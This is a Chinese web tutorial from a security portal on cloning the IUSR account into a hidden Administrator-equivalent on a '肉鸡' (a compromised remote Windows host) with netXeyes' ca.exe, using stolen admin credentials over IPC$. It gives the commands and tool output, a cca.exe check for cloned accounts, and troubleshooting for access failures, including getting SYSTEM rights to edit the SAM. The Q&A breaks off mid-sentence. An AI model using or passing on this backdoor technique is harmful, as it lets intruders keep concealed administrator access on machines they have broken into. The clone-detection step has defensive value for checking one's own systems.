精典的ASP传奇的J2EE新生的NETFTP服务器服务器安全WINDOWSB/S 模式WEB安全WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建Alexa专题DHTML项目管理WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual BasicVisual C/C++MssqlMySqloracleSybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术WAP入门
 您的位置:   >> 相关知识 >> 服务器搭建 >> 服务器安全 >>

利用SA.exe 将Iusr_victim克隆为Administrator

合金网络科技

  
  添加日期:2007-11-26 点击次数:20次  
   
  C:\>ca \\192.168.0.1 test test iusr_victim password 
Clone Administrator, by netXeyes 2002/04/06 
Written by netXeyes 2002, dansnow@21cn.com

Connect 192.168.0.1 ....OK 
Get SID of iusr_victim ....OK 
Prepairing ....OK 
Processing ....OK 
Clean Up ....OK

这时,iusr_victim就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。

注:在ca \\192.168.0.1 test test iusr_victim password 中, 
192.168.0.1是肉鸡的IP地址;第一个test是你已经得到的肉鸡上的管理员用户名,第二个test是这个用户名的密码;iusr_victim是你想克隆的帐号,最后这个password就是你想给iusr_victim用的密码。 
-------------------------------------------------------

用CCA.EXE检查是否存在克隆的帐号。 
不必改变ACL, 支持远程检查。 
C:\>cca \\192.168.0.29 administrator 123456 
Check Clone Account, by netXeyes 2002/04/29 
Written by netXeyes 2002, dansnow@21cn.com

Connect 192.168.0.29 ....OK 
Prepairing ....OK 
Processing ....OK 
Checking ....

Check Result:

[DuDu] AS SAME AS [administrator] 
[Guest] AS SAME AS [administrator] 
[IUSR_RONG] AS SAME AS [administrator] 
[IWAM_RONG] AS SAME AS [administrator] 
[TEST] AS SAME AS [administrator] 
[xr] AS SAME AS [administrator] 
[Guest] AS SAME AS [DuDu] 
[IUSR_RONG] AS SAME AS [DuDu] 
这上面的DuDu,guest,IUSR_RONG等帐户就已经是被克隆为administrator啦
注意删除克隆账户是小心一定注意。我试验过很多机子删除之后administrator账户不再超管组


其实可隆帐号就是利用命名管道来把sam文件重置一份,前提是要对方的netbios端口,NETBEUI协议都装了,而且ipc$,admin$都要开着~~
我记得还有在注册表下修改用户的SID也可以的,只要把所要可隆的帐号的SID改成已知的那个号的SID 具体自己到网上找~~
1,使用ca时,出现connect **.**.**.** ...Error是怎么会事? 
答:ca和cca需要目标开放ipc$,请确认可以与目标建立ipc$。参见“关于ipc$和空连接” 
2,使用ca时,出现“Processing....ERROR”是怎么会事? 
答:这说明对方主机缺少文件msvcp60.dll,想办法传个过去放在系统目录下就可以了。 
3,克隆过程没有错误,但cca没有显示该帐号克隆成功,无法使用被克隆的帐号。 
答:这一般是因为对方主机是域控制器,注册表中sam结构不同,工具失效。暂时无法解决。 
4,手动克隆无法访问注册表SAM键怎么办? 
答:在命令行方式,可以使用psu工具获得SYSTEM权限,从而访问SAM键。详见上面说明。 
在图形界面,运行regedt32.exe,找到SAM键并选中。“安全”子菜单栏里有一项“权限”,打开它。在里面设
精典的ASP精选TOP
· 利用ADODB.Stream 防盗链
· Adodb.Stream说明手册
· 采集需要登录
· ASP 判断远程图片是否存在
· 在ServerXMLHTTP组件中使用代理服务器
· 用XMLHTTP通过代理服务器从服务提取数据的一些问题
· objXML.readystate的值
· 互联网HTTP连接等出错代码大全
· 利用XMLHTTP实现的二级连动Select
· 利用 xmlhttp 分块上传文件
 
服务器安全点击TOP
· 新云最新漏洞总结篇
· 各类网站的默认数据库和密码
· Windows Server2003 防木马权限设置IIS服务器安全配置整理
· 针对ASP网站的Win 2003硬盘安全设置
· IIS 6 的PHP 最佳配置方法
· 利用SA.exe 将Iusr_victim克隆为Administrator
· Cmd模式下的入侵技术大全
· 破解网页代码加密
· SERV-U 6.4提权方法,通杀SERV-U版本
· 新云网站管理系统文件注入漏洞
 
硬设与组建点击TOP
· 从头到尾教你组建小型局域网20
· 从头到尾教你组建小型局域网19
· 从头到尾教你组建小型局域网18
· 从头到尾教你组建小型局域网17
· 从头到尾教你组建小型局域网16
· 从头到尾教你组建小型局域网15
· 从头到尾教你组建小型局域网14
· 从头到尾教你组建小型局域网13
· 从头到尾教你组建小型局域网12
· 从头到尾教你组建小型局域网11
 
病毒知识点击TOP
· 不再重装 手动清除顽固病毒AutoRUN
· 木马静态变动态 DLL木马程序大揭秘
· 详解一个很牛X的网马
· 一个网马
· Trojan-Downloader.Win32.Delf.bab
· 抓了一个AJAX的网马
· 迅雷5 最新0day利用程序
· 自动关掉270种杀毒软件
· RealPlayer 最新网马
· 五个反弹型后门的源代码
 
WINDOWS点击TOP
· 4【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 3【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 2【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 1【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· Capture an HTML document as an image
· 如何给eWebEditor编辑器加上运行代码框功能
· 给CuteEditor5增加了高亮代码显示功能
· CuteEditor6.0使用配置心得体会
· 关于IE插件的CLSID问题
· 对开发的程序(制作CAB)进行签名,并允许网站中使用
  "凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..."